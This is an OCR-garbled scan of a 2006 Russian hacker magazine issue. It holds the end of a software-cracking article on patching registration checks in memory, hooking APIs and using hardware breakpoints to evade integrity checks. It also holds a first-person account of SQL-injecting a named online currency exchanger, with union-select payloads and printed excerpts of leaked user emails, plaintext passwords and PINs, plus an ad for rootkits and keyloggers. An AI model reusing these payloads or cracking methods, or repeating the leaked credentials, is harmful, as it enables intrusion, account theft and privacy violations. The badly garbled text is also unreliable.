бесконечном цикле. Для надежности можно 
понизить приоритет ломаемого процесса, 
чтобы не давать ему слишком много квантов 
процессорного времени, однако, если слиш- 
ком увлечься этим, распаковка может вооб- 
ще никогда не завершиться. В большинстве 
случаев для успешного взлома не требуется 
никаких игр с приоритетами! 

Вся сложность состоит в том, что местополо- 
жение флага регистрации заранее не опре- 
делено. Мы знаем лишь то, что он хранится по 
смещению 10Н от блока памяти, на который 
указывает двойное слово 582СЕ8Н, инициа- 
лизируемое по ходу выполнения программы. 
Следовательно, алгоритм наших действий 
будет таков: дожидаемся, пока 582СЕ8Н 
приобретает ненулевое значение, и записы- 
ваем по смещению 1 0Рі значение 01 И, после 
чего выходим из «циклотрона» и позволяем 
программе продолжить свое выполнение в 
заблуждении, что она успешно зарегистри- 
рована: 



Ключевой фрагмент М*ЕхрІогег.сгаск.сусІоп.с| 

// ждем инициализации х_оііД '.у V я ■ ! • Ш ■' * X / ф 

ѵѵГіііѳ( ! х) РѳаЦРгосѳ 55 Мѳтогу(Д ^"^^^у^?Ѵ^^>^ 
рІ.ІіРГ0Се55,(Ѵ0ІЦ*)х_0^^&Х,5І2Ѳ0^(х),&М)'^ДДдДД 

//ждем инициализации флага регистрации и записиД 
// результатов проверки зашупъі^д ,■* ^ ^ 

ѵѵІііІе(соип1++<100)Д '• * 1 1 Щ : С 

ѴУгіІеРгосеззМетоіт/^у а ѵ 

рі.ГіРгосе53,(ѵоісІ*)(х+х_ісІх),&Ьо,5І2ео!Доо),&М);| 



С «гонками» кода все понятно. Дождавшись 
совпадения хакаемого кода (что свидетель- 
ствует о завершении распаковки данной 
части), мы модифицируем его и отваливаем 
в геіигп, поскольку никто другой модифици- 
ровать его не собирается (самомодифициру- 
ющиеся программы — не в счет, это тема для 
отдельного разговора). 

С переменными (к которым, в частности, от- 
носятся флаги регистрации) все сложнее, и 
они могут модифицироваться многократно. 
Первый раз — при конструировании объекта 
(если мы имеем дело с переменной-членом 
класса), второй раз — при явной инициали- 
зации (если только программист не забыл о 
ней), третий раз — при записи результатов 
проверки регистрационного ключа (файла, 
записи в реестре и т.д.). Поэтому одного- 
единственного вызова ѴѴгііеРгосеззМетогу 
явно не достаточно — приходится мотать 
бесконечный цикл. 

Цикл — дело не сложное, но слишком дурное. 
Неплохо бы выделить признак, что проверка 
регистрацииуже прошла, и переменная боль- 
ше изменяться не будет, а значит, ее можно 
не писать. Таким признаком может быть и по- 
явление главного окна программы (которое 
легко отследить функцией РіпбѴѴіпбоѵѵ), и вы- 
зов некоторой АРІ-функции 
(чуть позже мы покажем, как 
их перехватывать), и прос- 
то время распаковки. Ес- 
тественно, чем медленнее 
машина, тем больше ей тре- 
буется времени. В данном 
случае циклу записи хва- 
тает 100 «тиков» даже при 
запуске КІіЕхрІогег'апод ѴМ 
ѴѴаге на Р-ІІІ 733 МИг. 



О Перехват АРІ-функций 
каксигналинг 

Сигналом к началу модификации может слу- 
жить вызов какой-нибудь АРІ-функции. Пе- 
рехватываем функцию, вызываемую сразу 
же после распаковки (обычно ей становится 
ОеІѴегзіоп) и навешиваем на нее «сигнали- 
затор», извещающий нас о ее вызове. Это 
надежнее и эффективнее тупого ожидания 
или «гонок на опережение», только следует 
учесть, что ОеіѴегзіоп обычно вызывается по 
меньшей мере дважды: первый раз — из рас- 
паковщика, и второй — уже из стартового кода 
(зіагі-ир собе) распакованной программы 
Патч из стартового кода — это, так сказать, хак 
с большого расстояния, и в некоторых случаях 
желательно подобраться к защитному меха- 
низму как можно ближе. Для программ, защи- 
щенных ключевым файлом, хорошим решени- 
ем будетперехватСгеаіеРіІеА/СгеаіеРіІеѴѴ (для 
9х/І\ІТ соответственно), а также не помешает 
перехватить функции работы с реестром: 
РедОрепКеу/РедЕпитКеу/РедЕпитѴаІие. 
Чтобы отличить вызовы защитного механизма 
от всех остальных, мы можем опираться как 
на передаваемые АРІ-функции параметров, 
так и на адрес возврата. Дождавшись «свое- 



> Результат работы Эгх.с 



Ь !С ѴѴЛИНТѴ. Ѵ хЕ И иЗ?ЩМІТ гм» 

НісговдИ Ыіпсіоімз 2000 [Версия 5. 00.21951 
( С ) Корпор т ня Л а й к росо $ т , 1 9В 5 - 2000 . 

I : Ч П В Т Т СІ Е \ И леке г \ оп 1 і п е ра I с Ь > Л г х 
ІІтіз а 

ко 1 1 о , Ьг е ек ро і п І ! 

\Ы% ІЭ .1 

І_ ;\РШ ІСиЕ\Наскег\опІіпе-раіеЬ> 




/082 



ХАКЕР 09 /93/ 06 






















го» вызова, мы модифицируем защитный код 
по своему усмотрению, а в АРІ-функции, вы- 
зываемой после проверки валидности ключа, 
восстанавливаем все обратно. Этим мы обла- 
мываем проверки целостности, разбросан- 
ные по всей программе, гоняться за которыми 
нам просто-напросто лень. В ходе проверки 
оказывается, что на выполняемые между вы- 
зовами АРІ-функции эта сентенция не распро- 
страняется, и их приходится хачить вместе с 
остальным модифицированным кодом или... 
воспользоваться установкой аппаратных то- 
чек останова. 

Алгоритм перехвата значительно упрощает 
тот факт, что библиотека КЕРІ\ІЕІ_32.ЭІ_І_ во 
всех процессах грузится по одному и тому же 
адресу. Значит, чтобы определить адрес АРІ- 
функции вхакаемом процессе, достаточно оп- 
ределить его в своем ! Оба полученных адреса 
будут идентичны! В отношении остальных биб- 
лиотек такой уверенности нет — 113ЕР32.Э1_1_ 
и 0ЮІ332.ЭІ_І_, как правило, грузятся по одним 
и тем же адресам во всех процессах, но без 



1 00% гарантии, а вот прикладные библиотеки 
могут гулять по памяти в широких пределах — 
все зависит оттого, заняты ли базовые адреса 
загрузки другими библиотеками или нет. 
Далее, несмотря на то, что КЕПМЕІ_32.ЭІ_І_ 
проецируется на все процессы, при записи 
внедряемого кода соответствующие страни- 
цы памяти автоматически расщепляются, и 
модификация затронет только хакаемый про- 
цесс, никак не воздействуя на все остальные 
(это называется «копированием при записи» 
— сору-оп-ѵѵгііе). 

План наших действий в общих чертах вы- 
глядит так: определяем адрес выбранной 
АРІ-функции в своем процессе, вызываем 
ѴігЩаІАІІосЕх, выделяя вхакаемом процессе 
блок памяти, используемый для «сигналь- 
ных» целей, запоминаем его адрес и тут же 
копируем его в зМеМ-код, внедряемый в АРІ- 
функцию посредством ѴѴгііеРгосеззМетогу, 
естественно, сохранив его оригинальное 
содержимое. Впрочем, о перехвате АРІ-фун- 
кций мы уже неоднократно писали, такчто не 



будем повторяться. 

Рассмотрим усовершенствованный вариант 
нашего оп-Ііпе раісбег'а. Он перехватывает 
АРІ-функцию ОеіѴегзіоп, внедряя на ее мес- 
то збеІІ-код следующего содержания: іпс 
ЬуТе рТг [р_р]/геі, где р_р — адрес блока памя- 
ти, выделенного ѴігіиаІАІІосЕх. При каждом 
вызове ОеіѴегзіоп содержимое переменной 
р_р будет увеличиваться на единицу (ориги- 
нальное содержимое функции ѲеТѴегзіоп 
для простоты не сохраняется), и, когда оно 
достигнет двух, наш оп-Ііпе раісбег поймет, 
что программа распакована и пора прини- 
маться за модификацию. Естественно, что- 
бы отловить этот момент, приходится непре- 
рывноопрашиватьпеременнуюр_р, вызывая 
РеасІРгосеззМетогу в цикле, что не только 
некрасиво, но еще и непроизводительно. 
Эстеты могут воспользоваться средствами 
межпроцессорного взаимодействия (на- 
пример, семафорами), однако это усложнит 
реализацию збеІІ-кода, но вместе с тем улуч- 
шит качество оп-Ііпе раісНег'а. 
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О Аппаратные точки останова 

Наилучший результат дают аппаратные точки останова, 
установленные на критические машинные команды/пе- 
ременные защитного кода. Возвращаясь к листингу 1, 
мы бы могли установить аппаратную точку по исполне- 
нию на адрес 04Е59Е2Н (где расположена инструкция \т 
Іос_4Е5А37) и вместо того, чтобы модифицировать ее, 
просто изменить значение регистра ЕІР таким образом, 
чтобы он указывал на следующую машинную команду, 
как будто бы условный переход не выполнялся. То же 
самое и с переменной флага регистрации. Установить 
точку останова по чтению/записи — и тогда сторожевые 
псы, контролирующие целостность машинного кода, 
ничего не смогут обнаружить! Контрольная сумма об- 
раза файла не изменится, да и сам он останется в не- 
прикосновенности (поэтомузатакой взлом юридически 
очень трудно привлечь к ответственности). Красота, да 
и только! 

Подробнее о точках останова можно прочитать в руко- 
водстве ІпіеІ или в моей «Технике и философии хакер- 
ских атак», копию которой можно бесплатно скачать с 
ЙрУ/пегиті.ога.ги . Однако в работе с точками останова 



есть множество тонкостей, не отраженных в докумен- 
тации. Команда типа «тоѵ Эгх, еах» на прикладном ре- 
жиме вызовет исключение, обвиняющее нас в попытке 
выполнить привилегированную инструкцию на гіпд 3. Но 
не спеши засаживаться за написание драйвера — от- 
ладочные регистры беспрепятственно меняются через 
контекст! Для этого даже не обязательно обладать при- 
вилегиями администратора, и отлавливать отладочные 
исключения можно и через ЗЕН. 

Как это осуществить на практике — смотри в файле Эгх. 
с, выложенном на нашем 0\Ю. 

Устанавливать точки останова можно как в своем, так 
и в чужом потоке, но в последнем случае исключение 
поймаетчужой поток, аточнее, его собственный фильтр 
структурныхисключений, который можетбыть переуста- 
новлен в любой момент. Навряд ли он сумеет разобрать- 
ся, откуда взялось это исключение и что с ним делать, 
поэтому нашей первой задачей будет контроль за собс- 
твенным ЗЕН-обработчиком. Если ломаемая программа 
устанавливает новый ЗЕН-фильтр, то мы должны пере- 
кинуть наш обработчик наверх. Сделать это достаточно 
просто. Указатель на текущий ЗЕН-фрейм хранится по 
адресу Р3:[0], и нам ничего не стоит установить сюда 
точку останова по записи. Следует только помнить, что у 
каждого потока имеется свой собственный ЗЕН, а точек 
останова — всего четыре. С другой стороны, можно по- 
родить в отлаживаемом процессе своей поток (либо че- 
рез СгеаіеРетоіеТИгеаб, вызванной из оп-Ііпе раісНег'а, 
либо с помощью СгеаІеТНгеасІ из перехваченной АРІ- 
функции). 

Как вариант, оп-Ііпе раісбег может запустить ломаемую 
программу как отладочный процесс, получая уведомле- 
ния обо всех исключениях, но протекторы страшно не 
любят, когда их отлаживают, да и точки останова они 
предпочитают затирать еще в зародыше, поэтому уста- 
навливать их следует только на чистом коде, свободном 
от мин, то есть в непосредственной близости от защит- 
ного механизма, подобраться к которому позволяет пе- 
рехват АРІ-функций. 

□ Заключение 

Мы рассмотрели основные компоненты оп-Ііпе раісбег'а, 
продемонстрировав несколько эффективных методик, и 
хотя до законченной «ломалки» нам еще далеко, основ- 
ной фундамент уже заложен, а все остальное пытливый 
читатель сможет «достроить» и самостоятельно. И-И 



гапямгтази 



Вся информация в этой 
статье дана лишь в 
ознакомительных целях. 
За любое незаконное 
использование матери- 
ала автор и редакция не 
несут никакой ответс- 
твенности. 



/084 



ХАКЕР 09 /93/ 06 






























Ьсли при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал 



В продаже 
с 6 сентября 




» 



взлом 




л 

" -я?- ™ 




Красиво жить 
не запретишь 



АТАКА НА ОНЛАЙН-ОБМЕННИК 




КОГДА БРОДИШЬ ПО РАСКРУЧЕННЫМ ХАК-ФОРУМАМ, ТО И ДЕЛО НАТЫКАЕШЬСЯ НА ОБЪЯВЛЕНИЯ ТИПА: «ПРОДАМ БАЗУ 
ОБМЕННИКА ЗА 1 0К». ВОЗНИКАЕТ ВОПРОС: ОТКУДА БЕРУТСЯ ТАКИЕ БАЗЫ? ОЧЕВИДНО, ЧТО ДОБРО БЫЛО ВЫВЕДЕНО 
ПОСЛЕ ГРОМКОГО ВЗЛОМА. И НЕ ФАКТ, ЧТО АДМИНЫ ЗАКРЫЛИ БАГ, ЧЕРЕЗ КОТОРЫЙ ПОИМЕЛИ БУРЖУЙСКУЮ СИСТЕ- 
МУ. ПОДОБНЫЙ ТОПИК Я УЗРЕЛ НА ОДНОЙ, ИЗВЕСТНОЙ УЗКОМУ КРУГУ, БОРДЕ. КАКИЕ-ТО ЧУВАКИ ПРОДАВАЛИ БАЗУ С 
ОНЛАЙН-ОБМЕННИКА ЕЕОВЕХООШ (ѴѴѴѴѴѴ.Е-ЕОВЕХООІ_О.СОМ). ПРОСМОТРЕВ ПО ДИАГОНАЛИ ПОСТ, Я РЕШИЛ САМО- 
СТОЯТЕЛЬНО ВЗГЛЯНУТЬ НА ДАННЫЙ РЕСУРС. У МЕНЯ БЫЛА НАДЕЖДА, ЧТО УЯЗВИМОСТЬ ВСЕ ЕЩЕ ПРИСУТСТВУЕТ, А 
СЛЕДОВАТЕЛЬНО, ПОЯВЛЯЛАСЬ ВОЗМОЖНОСТЬ ЗАПОЛУЧИТЬ БАЗУ НА ХАЛЯВУ. 



О Первый осмотр 

Вбив в адресной строке браузера \лллллле- 
іогехаоісі.сопп . я оказался на сайте обмен- 
ника. В верхней части страницы находилось 
меню. Мое внимание сразу привлекли такие 
разделы, как Ьиу, зеМ , ехсбапде гаіе, сІеЬИ: 
сагсіз, доіб тегсбапі. Просмотрев инфор- 
мацию, предоставленную на сайте, я обна- 
ружил, что, кроме различных платежных 
систем, включая е-доісі, обменник работает 
и с ѴѴеЬМопеу. Сей факт почему-то вызвал 
улыбку на моем лице. Ну что же, настало 
время «протестировать» пациента ;). Изу- 
чив движок сайта, я понял, что расчитывать 
на инклуд или прочий режущий глаза баг 



— бесполезно. На ресурсах подобного 
уровня админы, как правило, заслужен- 
но получают свою зарплату. Ради инте- 
реса я решил проверить наличие веб- 
директории /асітіп. Оказалось, что она 
действительно существовала по адресу: 
ѵѵѵѵѵѵ.е-іогехаоіб.сот/абтіп/ . но для вхо- 
да требовался логин и пароль, которых 
у меня, естественно, не было. Тогда я 
начал осматривать разделы меню. На- 
иболее значимым мне показался пунктик 
хДапзхргезз. Я нажал на ссылку, и передо 
мной предстала форма входа в личный 
кабинет аккаунта. Тестирование скрипта 
авторизации показало, что он был напи- 



сан достаточно грамотно: входящие данные 
фильтровались и не отображались в браузе- 
ре. Аналогично дело обстояло еще с несколь- 
кими разделами. Я уже стал подумывать о том, 
что админ самостоятельно пропатчил движок, 
либо я работаю в неправильном направлении, 
но вдруг мне на глаза попался ничем не при- 
метный раздел доісі тегсИапі. В нем присутс- 
твовал скрипт беіаиІі.рИр, который использо- 
вал значение параметра саіедогуісі. В общем 
виде линк выглядел так: 

ЬДрзУ/ѵѵѵѵѵѵ.еЦогехдоІсІ.сот/тетЬегЩігесіогу/сІе^аиІі. 
рИр?саІедогуісІ= 1 
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КРАСИВО ЖИТЬ НЕ ЗАПРЕТИШЬ 




> База онлайн-обменника вида етаіі/пароль/логин 



Я предположил, что происходит выборка данных из 
БД, и оказался прав. Подставив символ кавычки «'» в 
значение параметра саіедогуісі, я передал следующий 
запрос: 

біір5://ѵѵѵѵѵѵ.е-іогехдоІб.сот/гпегпЬег_сІігесіогу/сІеіаиІі. 
рИр?са!:едогуісІ= 1 1 

И сразу же получил в ответ сообщение об ошибке: 

ѴоиЬаѵеапеггогіпуоигЗОБзупіах;сііескіЬетапиаІіЬаісоггезропсІз 
іо уоиг МуЗОІ_ зегѵег ѵегзіоп іог іііе гідГіі зупіах іо изе пеаг 'V ОРЮЕВ 
ВУ пате' аі Ііпе 1 

Вот оно! Тривиальная ЗОБ-іпіесііоп все-таки присутс- 
твовала, и это не могло не радовать. Оставалось лишь 
грамотно раскрутить найденный баг, что я и сделал. 

О В недрах БД 

В сети можно найти огромное количество материала 
по ЗОБчфесБоп (да и мы не раз писали об этом), поэто- 
му я не стану объяснять основы данного ремесла, а пе- 
рейду сразу к эксплуатации обнаруженной уязвимости. 
Первое, что меня интересовало, — мои права, аточнее, 
права моего юзера в базе. Как известно, доступ к тузці. 
изег имеет только определенный круг пользователей, 
указанный рутом. Для того чтобы проверить привилегии 
своего юзера, я сформировал запрос вида: 

біірз://ѵѵѵѵѵѵ.е-іогехдоІб.сот/гпегпЬег_сІігесіогу/сІеіаиІі. 
ріір?саіедогуісІ=-1 +ипіоп+зеІесі+*+ігот+туздІ.изег/* 

На что МуЗОБ ругнулся, выдав следующий ответ: 

8ЕІ_ЕСТ соттапсі сіепіесі іо изег 'еіогехдоІсГ@'ІосаІіюзі' іог іаЫе 
'изег' 

Увы, но доступа к таблице пользователей МуЗОБ я не 
имел, а следовательно, получить хэш рутового пароля 
не представлялось возможным. Но, несмотря на этот 
прискорбный факт, инъекция действительно работала, 
а это — главное. К сожалению, я не владел информаци- 
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> Управление чужим аккаунтом 

ей о названиях таблиц в базе, поэтому после недолгих 
раздумий я решил положиться на удачу, попробовав 
вручную подобрать имена таблиц. Остановив свой вы- 
бор на названии «изегз», я вбил в адресную строку: 

Гііірз://\л/ѵѵѵѵ.е-іогехдоІсІ.сот/тетЬег_сІігесіогу/сІеіаиІі. 
рбр?саіедогуісІ=-1 +ипіоп+зеІесі+1 ,Іодіп+ігот+изегз/* 

В результате чего меня послали идти лесом: 

ТаЫе 'еіогехдоісі. изегз' сіоезп'і ехізі 

Тогда я изменил «изегз» на «изег», исправив запрос со- 
ответствующим образом: 

Гііірз://\л/\л/ѵѵ.е-іогехдоІсІ.сот/тетЬег_сІігесіогу/сІеіаиІі. 
ріір?саіедогуісІ=-1 +ипіоп+зеІесі+1 ,Іодіп+ігот+изег/* 

На этот раз мне повезло. Мускул вернул ответ: 

ІІпкпоѵѵп соіитп 'Іодіп' іп 'ііеісі Іізі 1 

Что свидетельствовало об отсутствии поля «Іодіп» в 
таблице «изег». Далее необходимо было подобрать на- 
звания полей. Брутфорс запускать не имело смысла, и 
я решил проверить именаполей форм при регистрации. 
У меня оставалась надежда, что они могут совпасть с 
названиями полей в базе. Ведь все данные, полученные 
из полей форм, обрабатываются ріір-сценарием, кото- 
рый, вероятно, осуществляет обращение к базе МуЗОБ, 
внося в значения полей нужные изменения. Выбрав 
раздел регистрации ( ѵѵѵѵѵѵ.е-іогехаоісі.сот/ігапзхргезз/ 
изегз/пеуу), я открыл НітІ-код страницы: 

<р><ІаЬеІ іог="изег_іігзіпате">Еігзі пате</ІаЬеІ><Ьг/> 

сіприі Іс1="изег_іігзіпате" пате="изег[іігзіпате]" зІ2е="30" 

іуре="іехі"/х/р> 

<рхІаЬеІ іог="изег_Іа5іпате">І_азі пате</ІаЬеІхЬг/> 

<іприі Іс1="изег_1азіпате" пате="изег[1азіпате]" зІ2е="30" 

іуре="іехі"/х/р> 

<рхІаЬеІ іог="изег_етаіІ">Етаік/ІаЬеІхЬг/> 

<іприі ісІ="изег_етаіІ" пате="изег[етаіІ]" зІ2е="30" іуре="іехі" /х/ 



^ІШЗ 

> Никогда не пренеб- 
регай ЗОБ-іп]есііоп, 
даже если ты не знаешь 
названий таблиц и 
полей. В своей статье я 
наглядно показал опас- 
ность подобного рода 
уязвимостей. 




> На РУй-диске ты най- 
дешь видео по взлому 
онлайн-обменника. 



РНМДМ 



> Внимание! Все дейс- 
твия взломщика проти- 
возаконны! Инфор- 
мация предоставлена 
исключительно с целью 
ознакомления! Ни ав- 
тор, ни редакция за твои 
действия ответствен- 
ности не несут! 



ХАКЕР 09 /93/ 06 



/ 087 




» 



взлом 





Ійй -ам» и* 

> ЗОЫгцесйоп на сайте онлайн-обменника 



р> 

<р><ІаЬеІ ^ог="изег_рІпопе">РІпопе</ІаЬеІ><Ьг/> 
сіприі ісІ="изег_рГіопе" пате="изег[рІпопе]" зІ2е="30" 
1уре="1ехГ/хЬг/> 

Мизі Ье Йоте рЬопе. МоЬІІе/СеІІ ог ^ах<Ьг/> питЬегз 
по! ассеріесІ.</р> 

<р><ІаЬеІ Ьг="изег_раззѵѵогсІ">Разз\л/огсІ</ 

ІаЬеІхЬг/> 

сіприі: ісІ="изег_раззѵѵогсІ" пате="изег[разз\л/огсІ]" 
зІ2е="30" Іуре="разз\л/огсІ" /х/р> 

Меня интересовало значение параметра 
пате, которое передавалось скрипту с 
данными, введенными юзером при регист- 
рации. Для примера я попробовал выбрать 
мыльники пользователей из базы, указав в 
названии поля «етаіі». Получился запрос 
такого вида: 

ГіНрз ://\ллл/ѵѵ . е-1о гехдоісі . сот/те т Ье г_сІ і гесіогу/ 
сІе1аиіі.рІір?са1:едогуісІ=-1 ч-ипіоп+зеіесі+і ,етаіі+1го 
т+изег/* 

Через несколько секунд я стал обладателем 
небольшого спам-листа (кусок): 

УзегетеШіпеі.Гіг I загаЩуттзз@орІизпеі.сот.аи 
I ІесІп@ргісІаІ.сот I ѵѵезІеутс2@оріизпеі.сот.аи I 
ІпапкегѵізѲѵѵезІпеІ.сот.аи I Щд31@ѵѵеЬ.сІе I Япапсе@ 
зусіпеу.пеі I таД@сІезідпЬусосІе.сот I діІезуЬоу@ 
Ноітаіі.сот I апсІге\л/101@ізп.сс I кораапопсІ@ 
ѵѵеЬтаіі.со.га I ѵсІг_тіс@іпЬох.ги I уе 2 І 2 @росЫа. 
ги I іпѵезіазісІоІагки@уаІпоо.сот I сІгкотапсІиг@ 
уаГіоо.сот I апсІге\л/@хігасигІу.сот I сІзаѵіІІо@ 
ІГіеопііпетагкееІріасе.сот I 

Улыбка в очередной раз озарила мое лицо. 
Я быстро сконструировал еще один запрос 
к базе: 

ИДрзУ/ѵѵѵѵѵѵ.еЧогехдоІсІ.сот/тетЬегЩігесІогу/ 
сІе1аиІі.рІір?са1:едогуісІ=-1 +ипіоп+зеІес1+1 .раззѵѵогсі 
+1гот+изег/* 

И получил список всех паролей (кусок): 




> Выборка етаіі пользователей из БД 



I зІоІІІОІ I Цкд4сІЗЗсІЗ I ѵѵЬт344асІіоп I согеІІа5843 
I ОѴѴЕ498 I а3373а I саиіЬоп I 1234 I а030373а I 
АШНЕѴѴ I @93НкАЮ#д25913і I тозсіеі I уиіка I цѵѵегіу 
I гопу290872 I аепЬаѵісІі I дгіттуі I 061394 I геЬесса 
I ГіМ@Р1РЮрН I СезагіпаЗб I тотоііі I 12345678 I; 
газіпакі I гЗпсіГіі I рогс0405 I роѵѵег I 1гТзс11_НЕх4г I 
пеѵѵуогк2 1 2асІп97 1 Іосагпо 1 2зИтіІу 1 1 999 1 оЬІ4атрагі 
I сиггепсу I РаггіѵаІОІ I 230872 I теддзу2 I а12345 I 
е354сІ I Х43даЕ=63Ѵ I Ііп67кеі I огЬ_зр I дгесідѵѵіп I 
1 23ЛпІѴЮІде0124 I о\л/зЫЗХ37 I опііпе I 

Неплохо. Но мне хотелось большего — базы 
вида логин/пароль/етаіі. Как извлечь мыль- 
ники и пароли, я уже знал. Оставалось оп- 
ределить название поля, хранящего в себе 
логины юзеров. К сожалению, данные из 
ІЩтІ-кода формы регистрации на этот раз 
мне не помогли. Тогда я начал перебирать 
различные варианты названия поля в табли- 
це: изег, изегісі, ассоипі, пате и т.д. При под- 
становке «пате» в запрос к базе я получил 
список имен юзеров, который мне, впрочем, 
не облегчил задачу. Побродив еще немного 
по сайту обменника, я наткнулся на инте- 
ресную заметку в разделе восстановления 
пароля. В ней говорилось о каком-то РІЫ'е. 
Сначала я подумал, что в системе существу- 
ет дополнительная функция безопасности, 
использующая пин-код. Ради интереса я 
сделал выборку из БД по полю «ріп»: 

ЬДрзУ/ѵѵѵѵѵѵ.еЧогехдоІсІ.сот/тетЬегЩігесіогу/ 
сІе1аиІ1.рІпр?саІедогуісІ=-1 +ипіоп+зеІесі+1 ,ріп+1гот 
+изег/* 

После чего появился ответ (кусок): 

I ТХ-31 769 I ТХ-65552 I ТХ-96019 I ТХ-1 4221 I ТХ-90355 I 
ТХ-59674 I ТХ-96297 I ТХ-83594 I ТХ-77292 I ТХ-61 732 I 
ТХ-2651 4 I ТХ-47046 I ТХ-321 78 I ТХ-62544 I ТХ-23077 I 
ТХ-90086 I ТХ-53533 I ТХ-64442 I ТХ-6721 3 I 

Я ненадолго задумался. Странный формат 
записи пина почему-то не давал мне покоя. 
А что если этот пин и есть логин юзера? Я вы- 
брал опцию восстановления пароля и ввел 



ПАМЯТИ 

ОЕЗШЕВ'А 

ПОСВЯЩАЕТСЯ 

Статью, которую ты сейчас читаешь, 
и сам взлом я посвящаю своему другу 
□ЕЗіОЫЕР'у. разбившемуся в автокатас- 
трофе 12 июля и в последствие умерше- 
му в больнице 18 июля 2006 года. Он был 
честным вендором и просто хорошим че- 
ловеком, основавшим ресурс р4р (ѵѵѵѵѵѵ. 
реасе4реасе.сот ). Рюмку до дна за тебя, 
□ЕЗіОЫЕР, пусть земля тебе будет пухом... 



первый попавшийся пин. Нажав епіег, я уви- 
дел сообщение, содержание которого гла- 
сило, что пасс был отправлен на указанное 
при регистрации мыло. Значит, мое предпо- 
ложение оказалось верным: логином юзера 
служил именно ріп. Теперь было необходимо 
слить базу, да еще и в удобочитаемом виде. 
Для этого я использовал функцию СО[\ІСАТ(), 
объединяющую строки, а полученные дан- 
ные разделил при помощи сНаг(32), то есть 
пробела. Сам запрос получился такой: 

ИДрзУ/ѵѵѵѵѵѵ.еЧогехдоІсІ.сот/тетЬегЩігесіогу/ 
сІе1аиІІ.рЬр?саІедогуісІ=-1 +ипіоп+зеІесі+1 .СОІЧСАЩ 
етаіі, сЬаг(32), раззѵѵогсі, сЬаг(32),ріп)+Тот+изег/* 

Через некоторое время МуЗОІ_ послушно 
выполнил мою команду, и я получил, что хо- 
тел, — базу формата етаіі/пароль/логин. 

□ Управление чужим аккаунтом 

Выполнив цель своего визита, я решил про- 
верить практическую ценность базы. Все 
карты были у меня на руках: пароль хранил- 
ся в открытом виде, а вместо логина исполь- 
зовался пин. Выбрав наугад первого попав- 
шегося юзера, я залогинился в обменике. 
Внутри находилось меню управления акка- 
унтом, в котором можно было указать свой 
кошелек и банковские реквизиты, а также 
узнать состояние баланса. Разобравшись 
с меню, я понял, что вывести чужие деньги 
себе на счет в е-доІсГе не составит труда. Но 
делать этого не стал — свобода дороже :). 

□ Итоги взлома 

Я уже привык подводить итоги после каждого 
взлома. Время дорого, а бесполезно растра- 
ченное время — дорого вдвойне. К счастью, 
в этом случае время было потрачено не зря. Я 
получил ценную базу на 1500 аккаунтов поль- 
зователей онлайн-обменника. А админ ресур- 
са получил письмо от меня с описанием баги. 
Таким образом, почти все остались довольны, 
и мне не пришлось тратить кучу баксов на 
базу, лежащую на поверхности :). ЗС 
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сделано СПЕЦИАЛИСТАМИ 

по компьютерному шпионажу 

В СЕНТЯБРЬСКОМ НОМЕРЕ ЧИТАЙ: РУТКИТЫ И АНТИРУТКИТЫ — 
КЛАССИФИКАЦИЯ, ПРОГРАММИРОВАНИЕ, ПРОТИВОДЕЙСТВИЕ; 
ТЫ УЗНАЕШЬ, КАК СОЗДАТЬ СОБСТВЕННЫЙ КРУТОЙ КЕЙЛОГГЕР; 
СЛЕДИТЬ ЗА ЧУЖИМ БРАУЗЕРОМ — ЛЕГКО! ВСЕ О «ВНО»; 
НЕВИДИМОСТЬ — ЭТО ПРОСТО. КАК ОКОПАТЬ СВОЮ ПРОГРАММУ 
В СИСТЕМЕ? ИНФОРМАЦИЯ ИЗ ПЕРВЫХ РУК! 

ХОЧЕШЬ ЗНАТЬ БОЛЬШЕ? ЧИТАЙ ХАКЕР СПЕЦ! 





ДЕЛО БЫЛО ДЕКАБРЬСКОЙ НОЧЬЮ 2002 ГОДА. ЧЕТВЕРО БРАТКОВ РЕШИЛИ ОГРАБИТЬ БАНК. СОСТАВ ГРУППЫ БЫЛ КЛАС- 
СИЧЕСКИМ. ВСЕ, КАК В ФИЛЬМАХ: ТРОЕ БОЕВИКОВ ГРУППЫ ПРИКРЫТИЯ И ОДИН ПРОФЕССИОНАЛЬНЫЙ МЕДВЕЖАТНИК. 
БРАТКИ БЫЛИ РЕАЛЬНО КРУТЫ: ДВОЕ ИЗ ГРУППЫ НАХОДИЛИСЬ В СПИСКЕ САМЫХ РАЗЫСКИВАЕМЫХ ПРЕСТУПНИКОВ 
АМЕРИКИ. ПОЧЕМУ ТЕПЕРЬ ИХ ЗОВУТ НЕУДАЧНИКАМИ? ЧИТАЙ НИЖЕ. 



БИОМЕТРИЯ: КОНЦЕПЦИЯ И РЕАЛИИ 



ни долго готовились, отыскали 
план-схему здания, изучили мар- 
шруты передвижения охран ников, 
места, где были расположены видеокамеры 
наблюдения — в общем, все. И надо сказать, 
что у них почти получилось: они успешно 
избежали контакта с охранниками, прошли 
кучу дверей и проникли в туннель, ведущий 
к главному хранилищу. И тут-то их и настиг- 
ла птица обломинго. Их медвежатник стол- 
кнулся с устройством, с которым ему еще 
никогда не приходилось иметь дело — ска- 
нером отпечатков пальцев. Сдуру он попы- 
тался авторизоваться, но устройство было 
настроено так, что после двух неудачных 
попыток авторизации включалась система 
автоматической блокировки всех дверей. 
Там их и взяли, при этом все трое автома- 
тичков дружно называли своего горе-хаке- 
ра всякими нехорошими словами. Между 
прочим, руководство банка решило перейти 
на новый тип замка всего за день (!) до на- 
чала операции. Естественно, им тогда было 
неизвестно о наработках Мацумото, позво- 
ляющих хакнуть сканер отпечатков пальцев, 
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но об этом позже. Сначала давай разберем 
типы сканеров отпечатков пальцев. 
Получение электронного представления 
отпечатков пальцев с хорошо различимым 
папиллярным узором — достаточно сложная 
задача. Поскольку отпечаток пальца слишком 
мал, для получения его качественного изоб- 
ражения приходится использовать довольно 
замороченные методы. 

Все существующие сканеры отпечатков 
пальцев по используемым ими физическим 
принципам можно разделить на три группы: 
оптические, кремниевые, ультразвуковые. 
Оптические сканеры наиболее распростра- 
нены, поэтому сегодня я опишу именно их. 
Они основаны на использовании оптических 
методов получения изображения. В настоя- 
щее время существуют следующие техноло- 
гии реализации оптических сканеров. 

1 . РТІВ-сканеры представляют собой уст- 
ройства, в которых используется эффект на- 
рушенного полного внутреннего отражения 
(РгизігаіесІ ТоіаІ ІпіегпаІ РеЯесІіоп, РТІВ). Эта 
фича заключается в следующем. 

При падении света на границу раздела двух 



сред световая энергия делится на две части: 
одна отражается от границы, другая прони- 
кает через границу раздела во вторую среду. 
Доля отраженной энергии зависит от угла 
падения. Начиная с некоторой его величины, 
вся световая энергия отражается от грани- 
цы раздела. Это явление называется полным 
